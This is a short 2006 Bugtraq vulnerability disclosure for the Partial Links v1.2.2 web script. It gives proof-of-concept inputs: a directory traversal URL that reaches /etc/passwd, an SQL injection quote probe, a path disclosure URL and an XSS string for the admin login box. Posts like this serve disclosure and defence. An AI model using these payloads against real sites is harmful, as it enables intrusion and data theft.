Partial Links v1.2.2

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Partial Links v1.2.2
From: luny@xxxxxxxxxxxxxxx
Date: 6 Jun 2006 00:01:17 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Partial Links v1.2.2

Homepage:
http://www.particlesoft.net/particlelinks/

Effected files:
index.php
page_footer.php
admin.php

Exploits & Vulnerabilities:

Possible directory traversal?:
http://www.example.com/Other_Sites/X_%2526_Y/../../../../../etc/passwd/

SQL Injection:
http://www.example.com/index.php?topic='

Full path disclosure via page_footer.php:
http://www.example.com/includes/page_footer.php

Fatal error: Call to a member function on a non-object in 
/home/username/public_html/links/includes/page_footer.php 

on line 3

((It should be notedpage_header.php gives full path errors too))

The input form box to login as admin can be spoofed to remove the max char 
limit allowed and the input data isn't properally sanatized before being 
generated dynamically too. 

For proof of concept try entering the following in the username box:

>'';!--"<XSS><img src=lol.jpg>=&{()}<

Prev by Date: Particle Gallery v1.0.0
Next by Date: ParticleSoft Whois v1.0.3
Previous by thread: Particle Gallery v1.0.0
Next by thread: ParticleSoft Whois v1.0.3
Index(es):
- Date
- Thread